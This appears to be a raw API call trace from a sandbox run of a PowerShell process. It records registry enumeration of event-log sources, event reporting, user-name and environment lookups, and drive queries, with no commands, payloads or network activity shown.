	[0773.966] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x350) returned 0x0
	[0773.966] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.966] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x354) returned 0x0
	[0773.966] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.967] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x358) returned 0x0
	[0773.967] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.967] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x35c) returned 0x0
	[0773.967] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.967] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x360) returned 0x0
	[0773.967] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.967] RegOpenKeyExW (in: hKey=0x344, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x364) returned 0x0
	[0773.967] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.967] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x368) returned 0x0
	[0773.967] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x36c) returned 0x0
	[0773.968] RegCloseKey (hKey=0x36c) returned 0x0
	[0773.968] RegCloseKey (hKey=0x344) returned 0x0
	[0773.968] RegCloseKey (hKey=0x368) returned 0x0
	[0773.969] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1a8 | out: phkResult=0xcd1a8*=0x368) returned 0x0
	[0773.969] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd11c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd118, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd11c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd118*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.969] CoTaskMemFree (pv=0x0) 
	[0773.969] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.969] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x0, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.969] CoTaskMemFree (pv=0x22e660) 
	[0773.969] CoTaskMemFree (pv=0x0) 
	[0773.969] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.969] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x1, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.969] CoTaskMemFree (pv=0x22e660) 
	[0773.969] CoTaskMemFree (pv=0x0) 
	[0773.970] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.970] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x2, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.970] CoTaskMemFree (pv=0x22e660) 
	[0773.970] CoTaskMemFree (pv=0x0) 
	[0773.970] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.970] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x3, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.970] CoTaskMemFree (pv=0x22e660) 
	[0773.970] CoTaskMemFree (pv=0x0) 
	[0773.970] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.970] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x4, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.970] CoTaskMemFree (pv=0x22e660) 
	[0773.970] CoTaskMemFree (pv=0x0) 
	[0773.970] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.970] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x5, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.970] CoTaskMemFree (pv=0x22e660) 
	[0773.970] CoTaskMemFree (pv=0x0) 
	[0773.970] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.970] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x6, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.970] CoTaskMemFree (pv=0x22e660) 
	[0773.970] CoTaskMemFree (pv=0x0) 
	[0773.970] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.970] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x7, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.971] CoTaskMemFree (pv=0x22e660) 
	[0773.971] CoTaskMemFree (pv=0x0) 
	[0773.971] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.971] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x8, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.971] CoTaskMemFree (pv=0x22e660) 
	[0773.971] CoTaskMemFree (pv=0x0) 
	[0773.971] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x344) returned 0x0
	[0773.971] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.971] RegOpenKeyExW (in: hKey=0x368, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x36c) returned 0x0
	[0773.971] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.971] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x370) returned 0x0
	[0773.971] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.971] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x374) returned 0x0
	[0773.971] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.972] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x378) returned 0x0
	[0773.972] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.972] RegOpenKeyExW (in: hKey=0x368, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x37c) returned 0x0
	[0773.972] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.972] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x380) returned 0x0
	[0773.972] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.972] RegOpenKeyExW (in: hKey=0x368, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x384) returned 0x0
	[0773.972] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.972] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x388) returned 0x0
	[0773.972] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x38c) returned 0x0
	[0773.973] RegCloseKey (hKey=0x38c) returned 0x0
	[0773.973] RegCloseKey (hKey=0x368) returned 0x0
	[0773.973] RegCloseKey (hKey=0x388) returned 0x0
	[0773.974] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd178 | out: phkResult=0xcd178*=0x388) returned 0x0
	[0773.974] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd0ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd0ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.974] CoTaskMemFree (pv=0x0) 
	[0773.974] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.974] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x22e660, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.974] CoTaskMemFree (pv=0x22e660) 
	[0773.974] CoTaskMemFree (pv=0x0) 
	[0773.974] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.974] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x22e660, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.974] CoTaskMemFree (pv=0x22e660) 
	[0773.974] CoTaskMemFree (pv=0x0) 
	[0773.974] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.974] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x22e660, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.975] CoTaskMemFree (pv=0x22e660) 
	[0773.975] CoTaskMemFree (pv=0x0) 
	[0773.975] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.975] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x22e660, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.975] CoTaskMemFree (pv=0x22e660) 
	[0773.975] CoTaskMemFree (pv=0x0) 
	[0773.975] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.975] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x22e660, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.975] CoTaskMemFree (pv=0x22e660) 
	[0773.975] CoTaskMemFree (pv=0x0) 
	[0773.975] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.975] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x22e660, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.975] CoTaskMemFree (pv=0x22e660) 
	[0773.975] CoTaskMemFree (pv=0x0) 
	[0773.975] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.975] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x22e660, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.975] CoTaskMemFree (pv=0x22e660) 
	[0773.975] CoTaskMemFree (pv=0x0) 
	[0773.975] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.975] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x7, lpName=0x22e660, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.976] CoTaskMemFree (pv=0x22e660) 
	[0773.976] CoTaskMemFree (pv=0x0) 
	[0773.976] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.976] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x22e660, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.976] CoTaskMemFree (pv=0x22e660) 
	[0773.976] CoTaskMemFree (pv=0x0) 
	[0773.976] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x368) returned 0x0
	[0773.976] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0773.976] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x38c) returned 0x0
	[0773.976] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0773.976] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x390) returned 0x0
	[0773.977] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0773.977] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x394) returned 0x0
	[0773.977] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0773.977] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x398) returned 0x0
	[0773.977] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0773.977] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x39c) returned 0x0
	[0773.977] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0773.977] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x3a0) returned 0x0
	[0773.978] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0773.978] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x3a4) returned 0x0
	[0773.978] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0773.978] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x3a8) returned 0x0
	[0773.978] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x3ac) returned 0x0
	[0773.978] RegCloseKey (hKey=0x3ac) returned 0x0
	[0773.978] RegCloseKey (hKey=0x388) returned 0x0
	[0773.979] RegCloseKey (hKey=0x3a8) returned 0x0
	[0775.578] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b830008
	[0777.326] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3161fd8*="WSMan", lpRawData=0x3161d48) returned 1
	[0777.328] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0777.328] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0777.328] CoTaskMemFree (pv=0x1f3620) 
	[0777.330] CoTaskMemAlloc (cb=0x804) returned 0x2884c40
	[0777.330] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2884c40, nSize=0xcd468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd468) returned 0x1
	[0777.330] CoTaskMemFree (pv=0x2884c40) 
	[0777.330] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0777.330] GetUserNameW (in: lpBuffer=0x22e660, pcbBuffer=0xcd4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd4a8) returned 1
	[0777.331] CoTaskMemFree (pv=0x22e660) 
	[0777.331] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3167510*="Alias", lpRawData=0x31672a0) returned 1
	[0777.332] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0777.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0777.332] CoTaskMemFree (pv=0x1f3620) 
	[0777.333] CoTaskMemAlloc (cb=0x804) returned 0x2884c40
	[0777.334] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2884c40, nSize=0xcd468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd468) returned 0x1
	[0777.334] CoTaskMemFree (pv=0x2884c40) 
	[0777.334] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0777.334] GetUserNameW (in: lpBuffer=0x22e660, pcbBuffer=0xcd4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd4a8) returned 1
	[0777.334] CoTaskMemFree (pv=0x22e660) 
	[0777.335] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x316cb08*="Environment", lpRawData=0x316c898) returned 1
	[0777.337] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0777.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0777.337] CoTaskMemFree (pv=0x1f3620) 
	[0777.337] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0777.337] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0777.338] CoTaskMemFree (pv=0x1f3620) 
	[0777.338] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0777.338] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0777.338] CoTaskMemFree (pv=0x1f3620) 
	[0777.338] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xcd010, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0777.338] SetErrorMode (uMode=0x1) returned 0x1
	[0777.338] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xcd220 | out: lpFileInformation=0xcd220*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0777.338] SetErrorMode (uMode=0x1) returned 0x1
	[0777.340] GetLogicalDrives () returned 0x4
	[0777.340] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0777.341] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0777.341] SetErrorMode (uMode=0x1) returned 0x1
	[0777.342] CoTaskMemAlloc (cb=0x68) returned 0x286c710
	[0777.342] CoTaskMemAlloc (cb=0x68) returned 0x286c780
	[0777.342] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x286c710, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xcd1f0, lpMaximumComponentLength=0xcd1ec, lpFileSystemFlags=0xcd1e8, lpFileSystemNameBuffer=0x286c780, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xcd1f0*=0x9c354b42, lpMaximumComponentLength=0xcd1ec*=0xff, lpFileSystemFlags=0xcd1e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0777.343] CoTaskMemFree (pv=0x286c710) 
	[0777.343] CoTaskMemFree (pv=0x286c780) 
	[0777.343] SetErrorMode (uMode=0x1) returned 0x1
	[0777.343] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0777.343] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0777.344] SetErrorMode (uMode=0x1) returned 0x1
	[0777.344] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd190 | out: lpFileInformation=0xcd190*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0777.344] SetErrorMode (uMode=0x1) returned 0x1
	[0777.344] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0777.344] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0777.344] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0777.344] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0777.344] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0777.345] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
